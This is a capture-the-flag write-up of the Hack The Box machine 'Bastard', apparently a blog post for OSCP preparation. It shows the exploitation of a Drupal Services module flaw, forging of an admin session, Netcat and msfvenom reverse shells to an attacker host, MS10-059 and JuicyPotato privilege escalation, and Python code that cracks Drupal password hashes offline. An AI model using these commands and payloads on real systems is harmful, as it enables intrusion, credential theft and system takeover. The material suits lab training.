Hack The Box: Bastard Write-up (#33)

This is my 33rd box out of the 42 boxes I am working through for OSCP preparation. I am doing my best to learn and master the key skills for my upcoming OSCP exam by writing this series of blogs. So let’s begin.

Reconnaissance

As usual, run a full TCP scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.9
  • -sC: Run the default Nmap scripts
  • -sV: Service/version detection
  • -O: Enable OS detection
  • -oA: Save the results in all three formats (normal, grepable, XML) with the given basename
  • -p-: Scan all ports from 1–65535

We get back the following result:

  • 80: — Running HTTP service, Microsoft IIS httpd 7.5
  • 135: — Running Microsoft Windows RPC
  • 49154: — Running Microsoft Windows RPC
Nmap scan report for ip-10-10-10-9.ap-southeast-1.compute.internal (10.10.10.9)
Host is up (0.0089s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
...

Before we begin enumeration, let’s make some quick mental notes.

  1. Port 80 is running Microsoft IIS 7.5, which ships with Windows 7 and Windows Server 2008 R2. The link for this info can be found here. The http-generator header shows it is hosting Drupal 7. This is most likely our entry point to the box.
  2. Ports 135 and 49154 are Microsoft RPC (49154 is one of the dynamic RPC endpoint ports). We can do basic enumeration of them with the Nmap NSE scripts.

Service Enumeration

Port 80 (HTTP service)

Let’s visit the page.

I tried to log in with common and weak credentials, but none of them worked. Let’s run dirsearch.

python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php
  • -u: Target URL
  • -w: Wordlist
  • -e: File extension

We get back the following results.

[13:20:16] Starting: 
[13:24:23] 400 - 324B - /%ff/
[13:24:24] 200 - 8KB - /%3f/
[13:24:29] 200 - 7KB - /0
[13:53:02] 200 - 108KB - /changelog.txt
[14:18:49] 301 - 150B - /includes -> http://10.10.10.9/includes/
[14:19:42] 200 - 7KB - /index.php
[14:20:26] 200 - 2KB - /install.mysql.txt
[14:20:26] 200 - 2KB - /install.pgsql.txt
[14:20:30] 200 - 18KB - /install.txt
[14:20:31] 200 - 3KB - /install.php
[14:23:34] 200 - 18KB - /license.txt
[14:26:54] 200 - 9KB - /MAINTAINERS.txt
[14:29:40] 301 - 146B - /misc -> http://10.10.10.9/misc/
[14:30:16] 301 - 149B - /modules -> http://10.10.10.9/modules/
[14:32:37] 200 - 7KB - /node
[14:41:04] 301 - 150B - /profiles -> http://10.10.10.9/profiles/
[14:42:04] 200 - 5KB - /readme.txt
[14:42:44] 200 - 62B - /rest/
[14:42:51] 200 - 2KB - /robots.txt
[14:43:24] 301 - 149B - /scripts -> http://10.10.10.9/scripts/
[14:46:11] 301 - 147B - /sites -> http://10.10.10.9/sites/
[14:51:17] 301 - 148B - /themes -> http://10.10.10.9/themes/
[14:52:48] 200 - 10KB - /UPGRADE.txt
[14:53:29] 200 - 7KB - /user
[14:53:36] 200 - 7KB - /user/
[14:53:39] 200 - 7KB - /user/login/
[14:59:26] 200 - 42B - /xmlrpc.php

/changelog.txt is normally where we get the web application’s version: the first entry in Drupal’s CHANGELOG.txt is the installed release. Let’s visit it. We now have the exact Drupal version (7.54, which the install path C:\inetpub\drupal-7.54 seen later on the box confirms).

Let’s check for exploits published for this version after its release date. I came across this site, which explains the vulnerability affecting this install.

The weakness is not in Drupal core itself but in the contributed Services module (7.x-3.18 and earlier, fixed in 7.x-3.19). Its REST server accepts request bodies with the Content-Type application/vnd.php.serialized and passes them straight to unserialize(), giving an unauthenticated attacker PHP object injection. The published exploit turns that into SQL injection against the Drupal database, which is why it can read the admin account and rewrite the module’s cache, and from there into remote code execution.

Exploitation

Search for the exploits in searchsploit.

searchsploit drupal 7 remote code execution

Download the exploit.

searchsploit -m 41564.php

Let’s quickly review the code. It links to the same Services module write-up seen earlier and summarises how it works.

https://www.ambionics.io/blog/drupal-services-module-rce
# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current endpoint
#    along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
...

The steps are fairly simple. For the exploit to work, the target must have a Services REST endpoint enabled and we need to know its path. The dirsearch results show a /rest/ path answering 200 with a 62-byte body, which is probably it. Let’s access it.

It is. Next, modify the three variables at the top of the exploit: $url is the site root, $endpoint_path is the URL path of the REST endpoint, and $endpoint is the endpoint’s machine name as configured in Services (the exploit uses it to build the cache key it tampers with).

$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

Then execute the exploit.

php 41564.php

The exploit ran without errors and created two files, session.json and user.json. The comment block at the top of the output is just the Exploit-DB header: it sits above the opening <?php tag, so PHP echoes it verbatim instead of executing it, which is harmless. The last line is also worth noting: the exploit dropped a small PHP file in the webroot that eval()s whatever is POSTed to it, so that file is a second route to code execution. This walkthrough uses the forged admin session instead.

# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/dixuSOspsOUU.php

Let’s check the contents of the user.json.

{
"uid": "1",
"name": "admin",
"mail": "drupal@hackthebox.gr",
"theme": "",
"created": "1489920428",
"access": "1599707255",
"login": 1599729403,
"status": "1",
"timezone": "Europe\/Athens",
"language": "",
"picture": null,
"init": "drupal@hackthebox.gr",
"data": false,
"roles": {
"2": "authenticated user",
"3": "administrator"
},
"rdf_mapping": {
"rdftype": [
"sioc:UserAccount"
],
"name": {
"predicates": [
"foaf:name"
]
},
"homepage": {
"predicates": [
"foaf:page"
],
"type": "rel"
}
},
"pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"
}

This is not a newly created account: it is the existing administrator (uid 1, with the administrator role) pulled out of the users table by the SQL injection, together with its password hash. The hash is Drupal 7’s own format: $S$ marks salted, iterated SHA-512, the fourth character (D) encodes the cost (2^15 rounds) and the next eight characters are the salt. If we ever needed the clear-text password it could be attacked offline with hashcat mode 7900 or John’s drupal7 format. Let’s check the contents of session.json as well.
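To make the $S$ format concrete, here is an added example (my own code, not from the write-up and not Drupal’s source) that re-implements Drupal 7’s password hashing in Python, parses the dumped hash, and runs a small offline guess against it. The only value taken from the page is the hash string from user.json; the demo password, the word list and the helper names are constructed for the example, and the real password behind the dumped hash is not known from the page.

```python
"""Drupal 7 ($S$) password hashing, re-implemented for offline analysis.

Added example, not code from the write-up or from Drupal itself.
PAGE_HASH is copied from the user.json dump; everything else is constructed.
"""
import hashlib
import secrets

# phpass/Drupal alphabet, same order as in Drupal's includes/password.inc.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH: stored hashes are truncated to this
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT

# Hash taken from the user.json dump above (uid 1, "admin").
PAGE_HASH = "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"


def _b64_encode(data: bytes) -> str:
    """phpass-style base64: 6-bit groups taken little-endian, no padding."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str) -> dict:
    """Split a $S$ hash into cost and salt (its first 12 characters)."""
    if len(stored) < 12 or stored[:3] != "$S$":
        raise ValueError("not a Drupal 7 SHA-512 hash")
    count_log2 = ITOA64.index(stored[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("iteration count outside Drupal's allowed range")
    return {"count_log2": count_log2, "iterations": 1 << count_log2, "salt": stored[4:12]}


def drupal7_hash(password: bytes, salt: str, count_log2: int = 15) -> str:
    """Port of Drupal 7's _password_crypt('sha512', password, setting)."""
    if len(password) > 512:  # Drupal refuses very long passwords as a DoS guard
        raise ValueError("password too long")
    setting = "$S$" + ITOA64[count_log2] + salt
    digest = hashlib.sha512(salt.encode() + password).digest()
    for _ in range(1 << count_log2):  # do { ... } while (--count): exactly 2^n rounds
        digest = hashlib.sha512(digest + password).digest()
    return (setting + _b64_encode(digest))[:HASH_LENGTH]


def new_hash(password: bytes, count_log2: int = 15) -> str:
    """Hash with a fresh random salt, as user_hash_password() does."""
    salt = _b64_encode(secrets.token_bytes(6))  # 6 random bytes -> 8 salt chars
    return drupal7_hash(password, salt, count_log2)


def check_password(password: bytes, stored: str) -> bool:
    """Equivalent of user_check_password() for the $S$ case."""
    s = parse_setting(stored)
    candidate = drupal7_hash(password, s["salt"], s["count_log2"])
    return secrets.compare_digest(candidate, stored)


def guess_offline(stored: str, candidates):
    """Try each candidate password against a dumped hash; return the hit or None."""
    for word in candidates:
        if check_password(word.encode(), stored):
            return word
    return None


if __name__ == "__main__":
    info = parse_setting(PAGE_HASH)
    print(f"cost 2^{info['count_log2']} = {info['iterations']} rounds, salt {info['salt']!r}")
    # Constructed demo: hash a password we chose, then recover it from a tiny word list.
    demo = drupal7_hash(b"Winter2017!", info["salt"])
    print("demo hash:", demo)
    print("recovered:", guess_offline(demo, ["admin", "Password1", "Winter2017!"]))
```

Running it prints the cost and salt of the dumped hash and then recovers the constructed demo password from a three-word list. Against the real dump you would feed a proper wordlist, or hand the hash to hashcat (-m 7900) or John (--format=drupal7), which implement exactly this algorithm far faster. The 2^15 SHA-512 rounds per guess are what makes these hashes slow to crack compared with an unsalted MD5, which is one reason the forged session is the quicker way in.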

{
"session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
"session_id": "RW7tPSxNdc5UP8TPkKtSBzobkdBNpJKsmv318gHi56A",
"token": "k47rjRP3P-5SI2dlBQ9uOblKtfWqrUsiE6QhlYzKy3E"
}

Here we have a forged session for the admin account: the exploit created a valid Drupal session for uid 1 on the server side, so a browser that sends a cookie whose name is session_name and whose value is session_id is treated as the admin (the token is the CSRF token for the REST API, which the web UI does not need). Let’s use a cookie editor to key in these values.

Then refresh the page.

Nice! We are logged in as admin. Drupal 7 ships with a PHP filter module which, once enabled, lets any node saved with the "PHP code" text format execute embedded PHP. We can use this to get a reverse shell back to Kali. Go to the Modules tab and tick PHP filter to enable it.

Then scroll down to the bottom of the page and click Save Configuration.

To add PHP code, click Add content on the welcome page, then Article or Basic page. In my case, I selected Article.

Add the PHP upload-and-execute snippet as the body. You can find it here. Make sure to include the opening and closing PHP tags and to select PHP code as the Text format; with any other format the code is escaped and displayed instead of run.

Then click Save.

In my case, the entry is created under the path /node/2.

Let’s test it with a Windows command.

We are nt authority\iusr, the IIS anonymous account, so everything we run from here has only that account’s privileges. Let’s execute the systeminfo command.

The target is running Windows Server 2008 R2 Datacenter x64. Next, set up a simple Python web server.

root@kali:/htb/Bastard# python3 -m http.server 443

Let’s upload the nc64.exe binary to the target machine through the PHP snippet; the web server log shows the target fetching it. You can download the binary from here.

Binary uploaded successfully.

root@kali:/htb/Bastard# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.9 - - [11/Sep/2020 01:17:46] "GET /nc64.exe HTTP/1.0" 200 -
10.10.10.9 - - [11/Sep/2020 01:17:53] "GET /shell.php HTTP/1.0" 200 -

Now, set up a Netcat listener in your Kali Linux.

nc -nlvp 53

Execute the following commands from the browser.

nc64.exe -e cmd.exe 10.10.14.31 53

Go back to the listener and check if any connection received.

We got a shell! Grab the user flag.

Post-Exploitation Enumeration

Set up an SMB share with any share name. In my case, the share name is tools. I placed all the enumeration scripts there to make file transfer easy.

python /usr/share/doc/python3-impacket/examples/smbserver.py tools .

From the target machine, run the following command to copy systeminfo to our Kali Linux machine.

systeminfo > //10.10.14.31/tools/systeminfo.txt

Once completed, download Windows Exploit Suggester to find missing patches based on the systeminfo output we collected.

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git

Once done, update the database: the --update flag downloads the Microsoft security bulletin database and saves it as an Excel spreadsheet.

./windows-exploit-suggester.py --update

Then run the following command.

./windows-exploit-suggester.py --database 2020-09-11-mssb.xls --systeminfo /htb/Bastard/systeminfo.txt

The results list many known vulnerabilities for this Windows version. I tested a few of them, but none gave me a SYSTEM shell except MS10-059.

Privilege Escalation

Download the compiled MS10-059 binary from here; this is the Chimichurri exploit, which spawns a SYSTEM reverse shell to the IP and port given on its command line. Then copy it to the target using the SMB share method above.

Set up a Netcat listener on your Kali Linux.

nc -nlvp 443

Then execute the binary.

MS10-059.exe 10.10.14.31 443

Go back the listener.

We get a SYSTEM shell! Grab the root flag.

Extra Content

I used another method, token impersonation, to exploit this box. If we check the privileges of nt authority\iusr with whoami /priv, SeImpersonatePrivilege is enabled.

The popular JuicyPotato tool abuses that privilege: it coerces a SYSTEM-level COM server into authenticating to a local listener and impersonates the resulting token to launch our payload as SYSTEM.

Download the binary file from here. Next, create an MSFVenom reverse shell payload.

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o shell.exe

Then transfer the JuicyPotato.exe and shell.exe file to the target machine.

Set up a Netcat listener on your Kali Linux.

nc -nlvp 53

From the target machine, run the following command.

JuicyPotato.exe -l 1337 -p C:\inetpub\drupal-7.54\shell.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
  • -t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
  • -p <program>: program to launch
  • -l <port>: COM server listen port
  • -c <{clsid}>: CLSID (default BITS: {4991d34b-80a1-4291-83b6-3328366b9097})

A list of CLSIDs can be found here. The CLSID must be one that exists on the target’s OS version (any entry from that version’s list will do). Note that JuicyPotato relies on DCOM behaviour Microsoft changed in Windows 10 1809 and Server 2019, so on newer targets PrintSpoofer or RoguePotato take its place.

Go back to the listener.

We get a shell again.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Granny.

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.